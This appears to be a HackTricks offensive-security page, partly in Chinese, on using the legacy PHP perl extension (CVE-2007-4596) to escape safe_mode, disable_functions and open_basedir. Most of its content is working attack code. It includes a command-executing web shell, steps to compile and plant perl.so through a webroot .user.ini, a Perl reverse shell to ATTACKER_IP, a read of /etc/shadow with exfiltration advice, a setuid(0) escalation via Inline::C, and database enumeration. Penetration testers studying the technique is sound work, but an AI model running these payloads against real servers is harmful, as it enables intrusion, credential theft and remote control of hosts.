PHP Perl Extension Safe_mode Bypass Exploit

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

背景

跟踪为 CVE-2007-4596 的问题来自遗留的 perl PHP extension,该扩展嵌入了完整的 Perl 解释器,但不会遵循 PHP 的 safe_modedisable_functionsopen_basedir 控制。任何加载 extension=perl.so 的 PHP worker 都能获得不受限制的 Perl eval,因此即使所有经典的 PHP 进程生成原语被阻止,命令执行仍然很容易。尽管 safe_mode 在 PHP 5.4 中被移除,但许多过时的共享主机堆栈和易受攻击的实验室仍然包含它,因此当你进入遗留控制面板时,这个绕过仍然有价值。

Compatibility & Packaging Status (2025)

  • The last PECL release (perl-1.0.1, 2013) targets PHP ≥5.0; PHP 8+ generally fails because the Zend APIs changed.
  • PECL is being superseded by PIE, but older stacks still ship PECL/pear. Use the flow below on PHP 5/7 targets; on newer PHP expect to downgrade or switch to another injection path (e.g., userland FFI).

Building a Testable Environment in 2025

  • Fetch perl-1.0.1 from PECL, compile it for the PHP branch you plan to attack, and load it globally (php.ini) or via dl() (if permitted).
  • Quick Debian-based lab recipe:
sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2
  • During exploitation confirm availability with var_dump(extension_loaded('perl')); or print_r(get_loaded_extensions());. If absent, search for perl.so or abuse writable php.ini/.user.ini entries to force-load it.
  • Because the interpreter lives inside the PHP worker, no external binaries are needed—network egress filters or proc_open blacklists do not matter.

在可访问 phpize 时的主机内构建链

如果 phpize 和 build-essential 存在于被攻陷的主机上,你可以在不调用外部 OS 二进制的情况下编译并放置 perl.so

# grab the tarball from PECL
wget https://pecl.php.net/get/perl-1.0.1.tgz
tar xvf perl-1.0.1.tgz && cd perl-1.0.1
phpize
./configure --with-perl=/usr/bin/perl --with-php-config=$(php -r 'echo PHP_BINARY;')-config
make -j$(nproc)
cp modules/perl.so /tmp/perl.so
# then load with a .user.ini in the webroot if main php.ini is read-only
echo "extension=/tmp/perl.so" > /var/www/html/.user.ini

如果启用了 open_basedir,请确保放置的 .user.ini.so 位于允许的路径中;在 basedir 内仍然会遵循 extension= 指令。编译流程与 PHP 手册中构建 PECL 扩展的说明相同。

原始 PoC (NetJackal)

来源于 http://blog.safebuff.com/2016/05/06/disable-functions-bypass/,仍然有助于确认该扩展对 eval 有响应:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

现代有效载荷增强

1. 通过 TCP 获取完整 TTY

嵌入的解释器可以加载 IO::Socket,即使 /usr/bin/perl 被阻止:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. File-System Escape Even with open_basedir

Perl 会忽略 PHP 的 open_basedir,因此你可以读取任意文件:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

将输出通过 IO::Socket::INETNet::HTTP 管道发送以 exfiltrate 数据,而不接触 PHP 管理的描述符。

3. Inline Compilation for Privilege Escalation

如果 Inline::C 在系统范围内可用,可以在请求内编译辅助代码,而不依赖 PHP 的 ffipcntl

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

将 Perl 视为一个 LOLBAS 工具包——例如,即使没有 mysqli 也能转储 MySQL DSNs:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

参考资料

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks